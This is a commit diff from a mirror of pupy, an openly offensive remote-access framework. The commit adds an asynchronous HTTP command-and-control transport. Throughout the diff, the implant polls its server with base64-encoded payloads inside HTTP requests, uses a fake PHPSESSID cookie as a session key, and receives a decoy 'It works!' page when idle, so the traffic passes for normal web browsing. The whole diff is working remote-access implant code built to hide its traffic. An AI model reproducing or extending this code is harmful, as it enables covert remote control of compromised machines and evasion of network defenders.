mirror of https://github.com/n1nj4sec/pupy.git
base implementation for async payloads + first async_http payload (slow)
This commit is contained in:
parent
a396c359b7
commit
755af20e67
|
@ -19,6 +19,7 @@ class BasePupyTransport(object):
|
|||
self.upstream=stream.upstream
|
||||
self.stream=stream
|
||||
self.circuit=Circuit(self.stream, self)
|
||||
self.cookie=None
|
||||
|
||||
def on_connect(self):
|
||||
"""
|
||||
|
|
|
@ -16,6 +16,7 @@ class Buffer(object):
|
|||
self.waiting_lock=threading.Lock()
|
||||
self.waiting=threading.Event()
|
||||
self.transport=transport_func
|
||||
self.cookie=None
|
||||
|
||||
|
||||
def on_write(self):
|
||||
|
|
|
@ -9,6 +9,13 @@ class PupyClient(object):
|
|||
""" return a socket after connection """
|
||||
raise NotImplementedError("connect not implemented")
|
||||
|
||||
class PupyAsyncClient(object):
|
||||
def connect(self, host, port, timeout=10):
|
||||
self.host=host
|
||||
self.port=port
|
||||
self.timeout=timeout
|
||||
return self.host, self.port, self.timeout
|
||||
|
||||
class PupyTCPClient(PupyClient):
|
||||
def __init__(self, family = socket.AF_UNSPEC, socktype = socket.SOCK_STREAM, timeout = 3, nodelay = False, keepalive = False):
|
||||
super(PupyTCPClient, self).__init__()
|
||||
|
|
|
@ -4,8 +4,8 @@
|
|||
|
||||
import os
|
||||
import logging
|
||||
from .servers import PupyTCPServer
|
||||
from .clients import PupyTCPClient, PupySSLClient, PupyProxifiedTCPClient, PupyProxifiedSSLClient
|
||||
from .servers import PupyTCPServer, PupyAsyncTCPServer
|
||||
from .clients import PupyTCPClient, PupySSLClient, PupyProxifiedTCPClient, PupyProxifiedSSLClient, PupyAsyncClient
|
||||
from .transports import dummy, b64, http
|
||||
try:
|
||||
from .transports.obfs3 import obfs3
|
||||
|
@ -20,7 +20,7 @@ except ImportError as e:
|
|||
#to make pupy works even without scramblesuit dependencies
|
||||
logging.warning("%s. The scramblesuit transport has been disabled."%e)
|
||||
scramblesuit=None
|
||||
from .streams import PupySocketStream
|
||||
from .streams import *
|
||||
from .launchers.simple import SimpleLauncher
|
||||
from .launchers.auto_proxy import AutoProxyLauncher
|
||||
from .launchers.bind import BindLauncher
|
||||
|
@ -104,8 +104,8 @@ transports["tcp_base64"]={
|
|||
"server_transport_kwargs": {},
|
||||
}
|
||||
|
||||
transports["http_cleartext"]={
|
||||
"info" : "TCP transport using HTTP with base64 encoded payloads",
|
||||
transports["sync_http_cleartext"]={ #TODO fill with empty requests/response between each request/response to have only a following of req/res and not unusual things like req/req/req/res/res/req ...
|
||||
"info" : "TCP transport using HTTP with base64 encoded payloads (synchrone with Keep-Alive headers and one 3-way-handshake)",
|
||||
"server" : PupyTCPServer,
|
||||
"client": PupyTCPClient,
|
||||
"client_kwargs" : {},
|
||||
|
@ -117,6 +117,19 @@ transports["http_cleartext"]={
|
|||
"server_transport_kwargs": {},
|
||||
}
|
||||
|
||||
transports["async_http_cleartext"]={
|
||||
"info" : "TCP transport using HTTP with base64 encoded payloads (asynchrone with client pulling the server and multiple 3-way handshakes (slow))",
|
||||
"server" : PupyAsyncTCPServer,
|
||||
"client": PupyAsyncClient,
|
||||
"client_kwargs" : {},
|
||||
"authenticator" : None,
|
||||
"stream": PupyAsyncTCPStream ,
|
||||
"client_transport" : http.PupyHTTPClient,
|
||||
"server_transport" : http.PupyHTTPServer,
|
||||
"client_transport_kwargs": {},
|
||||
"server_transport_kwargs": {},
|
||||
}
|
||||
|
||||
if obfs3:
|
||||
transports["obfs3"]={
|
||||
"info" : "TCP transport using obfsproxy's obfs3 transport",
|
||||
|
|
|
@ -4,6 +4,198 @@
|
|||
from rpyc.utils.server import ThreadPoolServer
|
||||
from rpyc.core import Channel, Connection
|
||||
from rpyc.utils.authenticators import AuthenticationError
|
||||
from rpyc.core.stream import Stream
|
||||
from buffer import Buffer
|
||||
import threading, socket
|
||||
from streams.PupySocketStream import addGetPeer
|
||||
import logging
|
||||
|
||||
|
||||
class PseudoStreamDecoder(Stream):
|
||||
def __init__(self, transport_class, transport_kwargs):
|
||||
self.bufin=Buffer(transport_func=addGetPeer(("127.0.0.1", 443)))
|
||||
self.bufout=Buffer(transport_func=addGetPeer(("127.0.0.1", 443)))
|
||||
self.upstream=Buffer(transport_func=addGetPeer(("127.0.0.1", 443)))
|
||||
self.downstream=Buffer(transport_func=addGetPeer(("127.0.0.1", 443)))
|
||||
self.transport=transport_class(self, **transport_kwargs)
|
||||
self.lockin=threading.Lock()
|
||||
self.lockout=threading.Lock()
|
||||
|
||||
def decode_data(self, data):
|
||||
with self.lockin:
|
||||
#print "decoding %s"%repr(data)
|
||||
self.bufin.drain()
|
||||
self.bufin.write(data)
|
||||
self.transport.downstream_recv(self.bufin)
|
||||
cookie=self.bufin.cookie
|
||||
self.bufin.cookie=None
|
||||
return self.upstream.read(), cookie
|
||||
|
||||
def encode_data(self, data, cookie):
|
||||
with self.lockout:
|
||||
#print "encoding %s"%repr(data)
|
||||
self.bufout.drain()
|
||||
self.bufout.write(data)
|
||||
self.bufout.cookie=cookie
|
||||
self.transport.upstream_recv(self.bufout)
|
||||
return self.downstream.read()
|
||||
|
||||
class PupyAsyncServer(object):
|
||||
def __init__(self, service, **kwargs):
|
||||
if not "stream" in kwargs:
|
||||
raise ValueError("missing stream_class argument")
|
||||
if not "transport" in kwargs:
|
||||
raise ValueError("missing transport argument")
|
||||
self.stream_class=kwargs["stream"]
|
||||
self.transport_class=kwargs["transport"]
|
||||
self.transport_kwargs=kwargs["transport_kwargs"]
|
||||
del kwargs["stream"]
|
||||
del kwargs["transport"]
|
||||
del kwargs["transport_kwargs"]
|
||||
|
||||
self.authenticator=kwargs.get("authenticator", None)
|
||||
self.protocol_config=kwargs.get("protocol_config", {})
|
||||
self.service=service
|
||||
|
||||
self.active=False
|
||||
self.clients={}
|
||||
self.void_stream=PseudoStreamDecoder(self.transport_class, self.transport_kwargs)
|
||||
|
||||
def dispatch_data(self, data_received, host=None, port=None):
|
||||
""" receive data, forward it to the stream and send back the stream downstream if any """
|
||||
decoded, cookie=self.void_stream.decode_data(data_received)
|
||||
if cookie is None:
|
||||
logging.debug("failed to retreived cookie, rejecting data %s"%repr(data_received))
|
||||
return self.void_stream.encode_data("", None)
|
||||
if cookie not in self.clients:
|
||||
logging.info("new client connected : %s:%s cookie=%s"%(host, port, cookie))
|
||||
config = dict(self.protocol_config, credentials=None, connid="%s:%d"%(host, port))
|
||||
if self.authenticator:
|
||||
try:
|
||||
sock, credentials = self.authenticator(data_received)
|
||||
config["credentials"]=credentials
|
||||
except AuthenticationError:
|
||||
logging.info("failed to authenticate, rejecting data")
|
||||
raise
|
||||
self.clients[cookie]=self.stream_class((host, port), self.transport_class, self.transport_kwargs)
|
||||
self.clients[cookie].buf_in.cookie=cookie
|
||||
self.clients[cookie].buf_out.cookie=cookie
|
||||
conn=Connection(self.service, Channel(self.clients[cookie]), config=config, _lazy=True)
|
||||
t = threading.Thread(target = self.handle_new_conn, args=(conn,))
|
||||
t.daemon=True
|
||||
t.start()
|
||||
resp=None
|
||||
with self.clients[cookie].upstream_lock:
|
||||
self.clients[cookie].upstream.write(decoded)
|
||||
#return self.void_stream.encode_data(self.clients[cookie].downstream.read(), cookie)
|
||||
resp=self.clients[cookie].downstream.read()
|
||||
if not resp: # No data to send, so we send the default page with no data
|
||||
resp=self.void_stream.encode_data("", cookie)
|
||||
|
||||
return resp
|
||||
|
||||
def handle_new_conn(self, conn):
|
||||
try:
|
||||
conn._init_service()
|
||||
conn.serve_all()
|
||||
#while True:
|
||||
# conn.serve(0.01)
|
||||
except Exception as e:
|
||||
logging.error(e)
|
||||
|
||||
def accept(self):
|
||||
""" Should call dispatch_data on data retrieved. Data must contain a \"cookie\" to define to which connection the packet of data belongs to """
|
||||
raise NotImplementedError()
|
||||
|
||||
def close(self):
|
||||
raise NotImplementedError()
|
||||
|
||||
def start(self):
|
||||
""" blocking while the server is active """
|
||||
raise NotImplementedError()
|
||||
|
||||
class PupyAsyncTCPServer(PupyAsyncServer):
|
||||
def __init__(self, *args, **kwargs):
|
||||
super(PupyAsyncTCPServer, self).__init__(*args, **kwargs)
|
||||
self.sock=None
|
||||
self.hostname=kwargs['hostname']
|
||||
self.port=kwargs['port']
|
||||
|
||||
def listen(self):
|
||||
s=None
|
||||
if not self.hostname:
|
||||
self.hostname=None
|
||||
last_exc=None
|
||||
for res in socket.getaddrinfo(self.hostname, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM, 0, socket.AI_PASSIVE):
|
||||
af, socktype, proto, canonname, sa = res
|
||||
try:
|
||||
s = socket.socket(af, socktype, proto)
|
||||
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
except socket.error as msg:
|
||||
s = None
|
||||
last_exc=msg
|
||||
continue
|
||||
try:
|
||||
s.bind(sa)
|
||||
s.listen(100)
|
||||
except socket.error as msg:
|
||||
s.close()
|
||||
s = None
|
||||
last_exc=msg
|
||||
continue
|
||||
break
|
||||
self.sock=s
|
||||
if self.sock is None:
|
||||
raise last_exc
|
||||
|
||||
def accept(self):
|
||||
try:
|
||||
s, addr = self.sock.accept()
|
||||
t=threading.Thread(target=self.serve_request, args=(s, addr,))
|
||||
t.daemon=True
|
||||
t.start()
|
||||
#TODO : make a pool of threads
|
||||
except Exception as e:
|
||||
logging.error(e)
|
||||
|
||||
def serve_request(self, s, addr):
|
||||
full_req=b""
|
||||
s.settimeout(0.1)
|
||||
while True:
|
||||
try:
|
||||
d=s.recv(4096)
|
||||
if not d:
|
||||
break
|
||||
full_req+=d
|
||||
except socket.timeout:
|
||||
break
|
||||
try:
|
||||
if full_req:
|
||||
response=self.dispatch_data(full_req, host=addr[0], port=addr[1])
|
||||
#print "sending response: %s"%repr(response)
|
||||
s.sendall(response)
|
||||
finally:
|
||||
s.close()
|
||||
|
||||
def start(self):
|
||||
self.listen()
|
||||
self.active=True
|
||||
try:
|
||||
while self.active:
|
||||
self.accept()
|
||||
except EOFError:
|
||||
pass # server closed by another thread
|
||||
except KeyboardInterrupt:
|
||||
print("")
|
||||
print "keyboard interrupt!"
|
||||
finally:
|
||||
logging.info("server has terminated")
|
||||
self.close()
|
||||
|
||||
def close(self):
|
||||
#TODO
|
||||
pass
|
||||
|
||||
|
||||
class PupyTCPServer(ThreadPoolServer):
|
||||
def __init__(self, *args, **kwargs):
|
||||
|
|
|
@ -0,0 +1,208 @@
|
|||
# -*- coding: UTF8 -*-
|
||||
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
|
||||
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
||||
""" abstraction layer over rpyc streams to handle different transports and integrate obfsproxy pluggable transports """
|
||||
|
||||
__all__=["PupyAsyncTCPStream"]
|
||||
|
||||
from rpyc.core.stream import Stream
|
||||
from ..buffer import Buffer
|
||||
import sys, socket, time, errno, logging, traceback, string, random, threading
|
||||
from rpyc.lib.compat import select, select_error, BYTES_LITERAL, get_exc_errno, maxint
|
||||
from PupySocketStream import addGetPeer
|
||||
|
||||
class addGetPeer(object):
|
||||
""" add some functions needed by some obfsproxy transports"""
|
||||
def __init__(self, peer):
|
||||
self.peer=peer
|
||||
def getPeer(self):
|
||||
return self.peer
|
||||
|
||||
def monitor(st):
|
||||
while True:
|
||||
print "upstream: %s %s"%(len(st.upstream),repr(st.upstream.peek()))
|
||||
print "downstream: %s %s"%(len(st.downstream), repr(st.downstream.peek()))
|
||||
print "buf_in: %s %s"%(len(st.buf_in), st.buf_in.peek())
|
||||
print "buf_out: %s %s"%(len(st.buf_out), st.buf_out.peek())
|
||||
time.sleep(3)
|
||||
|
||||
|
||||
class PupyAsyncStream(Stream):
|
||||
""" Pupy asynchrone stream implementation """
|
||||
def __init__(self, dstconf, transport_class, transport_kwargs={}):
|
||||
super(PupyAsyncStream, self).__init__()
|
||||
self.active=True
|
||||
#buffers for streams
|
||||
self.buf_in=Buffer()
|
||||
self.buf_out=Buffer()
|
||||
self.buf_tmp=Buffer()
|
||||
self.cookie=''.join(random.SystemRandom().choice("abcdef0123456789") for _ in range(32))
|
||||
self.buf_in.cookie=self.cookie
|
||||
self.buf_out.cookie=self.cookie
|
||||
self.buf_tmp.cookie=self.cookie
|
||||
#buffers for transport
|
||||
self.upstream=Buffer(transport_func=addGetPeer(("127.0.0.1", 443)))
|
||||
self.downstream=Buffer(transport_func=addGetPeer(("127.0.0.1", 443)))
|
||||
self.upstream_lock=threading.Lock()
|
||||
self.downstream_lock=threading.Lock()
|
||||
self.transport=transport_class(self, **transport_kwargs)
|
||||
|
||||
self.max_pull_interval=2
|
||||
self.pull_interval=0
|
||||
self.pull_event=threading.Event()
|
||||
self.MAX_IO_CHUNK=32000*100 #3Mo because it is a async transport
|
||||
|
||||
#threading.Thread(target=monitor, args=(self,)).start()
|
||||
self.client_side=self.transport.client
|
||||
if self.client_side:
|
||||
self.poller_thread=threading.Thread(target=self.poller_loop)
|
||||
self.poller_thread.daemon=True
|
||||
self.poller_thread.start()
|
||||
|
||||
def close(self):
|
||||
"""closes the stream, releasing any system resources associated with it"""
|
||||
print "closing stream !"
|
||||
self.active=False
|
||||
self.buf_in.cookie=None
|
||||
self.buf_out.cookie=None
|
||||
|
||||
@property
|
||||
def closed(self):
|
||||
"""tests whether the stream is closed or not"""
|
||||
return not self.active
|
||||
|
||||
def fileno(self):
|
||||
"""returns the stream's file descriptor"""
|
||||
raise NotImplementedError()
|
||||
|
||||
def poll(self, timeout):
|
||||
"""indicates whether the stream has data to read (within *timeout*
|
||||
seconds)"""
|
||||
return (len(self.upstream) > 0) or self.closed
|
||||
|
||||
def read(self, count):
|
||||
try:
|
||||
#print "reading :%s"%count
|
||||
while True:
|
||||
#with self.downstream_lock: #because downstream write in upstream
|
||||
if not self.active:
|
||||
raise EOFError("connexion closed")
|
||||
if len(self.upstream)>=count:
|
||||
if not self.active:
|
||||
raise EOFError("connexion closed")
|
||||
#print "%s read upstream !"%count
|
||||
return self.upstream.read(count)
|
||||
self.pull()
|
||||
time.sleep(0.01)
|
||||
|
||||
#it seems we can actively wait here with only perf enhancement
|
||||
#if len(self.upstream)<count:
|
||||
# self.upstream.wait(0.1)#to avoid active wait
|
||||
|
||||
except Exception as e:
|
||||
logging.debug(traceback.format_exc())
|
||||
|
||||
def pull_data(self, data):
|
||||
"""
|
||||
function called at each "tick" (poll interval). It takes the data to send, send it with a unique cookie, and must return the obfuscated data retrieved.
|
||||
"""
|
||||
raise NotImplementedError()
|
||||
|
||||
def pull(self):
|
||||
""" make a pull if we are on the client side, else do nothing """
|
||||
if not self.client_side:
|
||||
return
|
||||
self.pull_interval=0
|
||||
self.pull_event.set()
|
||||
|
||||
def poller_loop(self):
|
||||
empty_message=None
|
||||
while self.active:
|
||||
try:
|
||||
data_to_send=None
|
||||
if len(self.downstream)>0:
|
||||
with self.upstream_lock:
|
||||
data_to_send=self.downstream.read()
|
||||
else:
|
||||
if empty_message is None :
|
||||
#no data, let's generate an empty encoded message to pull
|
||||
self.buf_tmp.drain()
|
||||
self.transport.upstream_recv(self.buf_tmp)
|
||||
empty_message=self.downstream.read()
|
||||
data_to_send=empty_message
|
||||
|
||||
received_data=b""
|
||||
try:
|
||||
received_data=self.pull_data(data_to_send)
|
||||
except IOError as e:
|
||||
print "IOError: %s"%e
|
||||
print "closing connection"
|
||||
self.close()
|
||||
|
||||
with self.downstream_lock:
|
||||
if received_data:
|
||||
self.buf_in.write(received_data)
|
||||
self.transport.downstream_recv(self.buf_in)
|
||||
if not self.pull_event.wait(self.pull_interval): #then timeout
|
||||
self.pull_interval+=0.01
|
||||
if self.pull_interval>self.max_pull_interval:
|
||||
self.pull_interval=self.max_pull_interval
|
||||
#print "pull interval: %s"%self.pull_interval
|
||||
self.pull_event.clear()
|
||||
except Exception as e:
|
||||
logging.debug(traceback.format_exc())
|
||||
time.sleep(self.pull_interval)
|
||||
|
||||
def write(self, data):
|
||||
if not self.active:
|
||||
raise EOFError("connexion closed")
|
||||
with self.upstream_lock:
|
||||
self.buf_out.write(data)
|
||||
self.transport.upstream_recv(self.buf_out)
|
||||
self.pull()
|
||||
|
||||
class PupyAsyncTCPStream(PupyAsyncStream):
|
||||
def __init__(self, dstconf, transport_class, transport_kwargs={}):
|
||||
self.hostname=dstconf[0]
|
||||
self.port=dstconf[1]
|
||||
super(PupyAsyncTCPStream, self).__init__(dstconf, transport_class, transport_kwargs)
|
||||
|
||||
def pull_data(self, data):
|
||||
s = None
|
||||
last_exc=None
|
||||
for res in socket.getaddrinfo(self.hostname, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM):
|
||||
af, socktype, proto, canonname, sa = res
|
||||
try:
|
||||
s = socket.socket(af, socktype, proto)
|
||||
except socket.error as msg:
|
||||
s = None
|
||||
last_exc=msg
|
||||
continue
|
||||
try:
|
||||
s.connect(sa)
|
||||
except socket.error as msg:
|
||||
s.close()
|
||||
s = None
|
||||
last_exc=msg
|
||||
continue
|
||||
break
|
||||
if s is None:
|
||||
raise last_exc
|
||||
#print "sending %s"%repr(data)
|
||||
s.sendall(data)
|
||||
total_received=b""
|
||||
#print "receiving ..."
|
||||
s.settimeout(15)
|
||||
while True:
|
||||
try:
|
||||
data = s.recv(4096)
|
||||
if not data:
|
||||
break
|
||||
total_received+=data
|
||||
except socket.timeout:
|
||||
break
|
||||
|
||||
#print "received: %s"%repr(total_received)
|
||||
s.close()
|
||||
return total_received
|
||||
|
|
@ -2,9 +2,12 @@
|
|||
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
|
||||
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
||||
""" abstraction layer over rpyc streams to handle different transports and integrate obfsproxy pluggable transports """
|
||||
|
||||
__all__=["PupySocketStream"]
|
||||
|
||||
import sys
|
||||
from rpyc.core import SocketStream
|
||||
from .buffer import Buffer
|
||||
from ..buffer import Buffer
|
||||
import socket
|
||||
import time
|
||||
import errno
|
||||
|
@ -12,7 +15,7 @@ import logging
|
|||
import traceback
|
||||
from rpyc.lib.compat import select, select_error, BYTES_LITERAL, get_exc_errno, maxint
|
||||
import threading
|
||||
retry_errnos = (errno.EAGAIN, errno.EWOULDBLOCK)
|
||||
|
||||
|
||||
class addGetPeer(object):
|
||||
""" add some functions needed by some obfsproxy transports"""
|
||||
|
@ -52,7 +55,7 @@ class PupySocketStream(SocketStream):
|
|||
return
|
||||
except socket.error:
|
||||
ex = sys.exc_info()[1]
|
||||
if get_exc_errno(ex) in retry_errnos:
|
||||
if get_exc_errno(ex) in (errno.EAGAIN, errno.EWOULDBLOCK):
|
||||
# windows just has to be a bitch
|
||||
return
|
||||
self.close()
|
||||
|
@ -73,16 +76,6 @@ class PupySocketStream(SocketStream):
|
|||
if len(self.downstream)>0:
|
||||
super(PupySocketStream, self).write(self.downstream.read())
|
||||
|
||||
"""
|
||||
def _downstream_recv_loop(self):
|
||||
try:
|
||||
while True:
|
||||
self._read()
|
||||
self.transport.downstream_recv(self.buf_in)
|
||||
except EOFError as e:
|
||||
self.upstream.set_eof(e)
|
||||
"""
|
||||
|
||||
def read(self, count):
|
||||
try:
|
||||
if len(self.upstream)>=count:
|
|
@ -0,0 +1,5 @@
|
|||
# -*- coding: UTF8 -*-
|
||||
|
||||
from PupySocketStream import *
|
||||
from PupyAsyncStream import *
|
||||
|
|
@ -31,9 +31,14 @@ def http_req2data(s):
|
|||
decoded_data=base64.b64decode(path[1:])
|
||||
except:
|
||||
raise MalformedData("can't decode b64")
|
||||
if not decoded_data:
|
||||
raise MalformedData("empty data")
|
||||
return decoded_data
|
||||
cookie=None
|
||||
try:
|
||||
for line in s.split("\r\n"):
|
||||
if line.startswith("Cookie"):
|
||||
cookie=(line.split(":",1)[1]).split("=")[1].strip()
|
||||
except:
|
||||
pass
|
||||
return decoded_data, cookie
|
||||
|
||||
|
||||
error_response_body="""<html><body><h1>It works!</h1>
|
||||
|
@ -54,6 +59,7 @@ class PupyHTTPTransport(BasePupyTransport):
|
|||
pass
|
||||
|
||||
class PupyHTTPClient(PupyHTTPTransport):
|
||||
client=True #to start polling
|
||||
def __init__(self, *args, **kwargs):
|
||||
PupyHTTPTransport.__init__(self, *args, **kwargs)
|
||||
self.headers=OrderedDict({
|
||||
|
@ -62,12 +68,16 @@ class PupyHTTPClient(PupyHTTPTransport):
|
|||
"Connection" : "keep-alive",
|
||||
})
|
||||
|
||||
|
||||
def upstream_recv(self, data):
|
||||
"""
|
||||
raw data to HTTP request
|
||||
need to send a request anyway in case of empty data (for pulling purpose !)
|
||||
"""
|
||||
try:
|
||||
d=data.peek()
|
||||
if data.cookie is not None:
|
||||
self.headers['Cookie']="PHPSESSID=%s"%data.cookie
|
||||
encoded_data=data2http_req(d, self.headers)
|
||||
data.drain(len(d))
|
||||
self.downstream.write(encoded_data)
|
||||
|
@ -94,7 +104,7 @@ class PupyHTTPClient(PupyHTTPTransport):
|
|||
if content_length is None:
|
||||
break
|
||||
decoded_data+=base64.b64decode(rest[:content_length])
|
||||
length_to_drain=content_length+4+len(headers)+len(fl)+2
|
||||
length_to_drain=content_length+4+len(head)
|
||||
data.drain(length_to_drain)
|
||||
d=d[length_to_drain:]
|
||||
except Exception as e:
|
||||
|
@ -104,8 +114,8 @@ class PupyHTTPClient(PupyHTTPTransport):
|
|||
self.upstream.write(decoded_data)
|
||||
|
||||
|
||||
|
||||
class PupyHTTPServer(PupyHTTPTransport):
|
||||
client=False
|
||||
def __init__(self, *args, **kwargs):
|
||||
PupyHTTPTransport.__init__(self, *args, **kwargs)
|
||||
|
||||
|
@ -140,7 +150,9 @@ class PupyHTTPServer(PupyHTTPTransport):
|
|||
for req in tab:
|
||||
try:
|
||||
if req:
|
||||
decoded_data += http_req2data(req)
|
||||
newdata, cookie = http_req2data(req)
|
||||
decoded_data+=newdata
|
||||
data.cookie=cookie
|
||||
data.drain(len(req)+4)
|
||||
except MalformedData:
|
||||
logging.debug("malformed data drained: %s"%repr(req))
|
||||
|
|
|
@ -203,15 +203,14 @@ def rpyc_loop(launcher):
|
|||
event=threading.Event()
|
||||
t=threading.Thread(target=check_timeout, args=(event, stream.close))
|
||||
t.daemon=True
|
||||
t.start()
|
||||
#t.start()
|
||||
try:
|
||||
conn=rpyc.utils.factory.connect_stream(stream, ReverseSlaveService, {})
|
||||
finally:
|
||||
event.set()
|
||||
while True:
|
||||
while not stream.closed:
|
||||
attempt=0
|
||||
conn.serve()
|
||||
time.sleep(0.001)
|
||||
conn.serve(0.001)
|
||||
except KeyboardInterrupt:
|
||||
raise
|
||||
except EOFError:
|
||||
|
|
Loading…
Reference in New Issue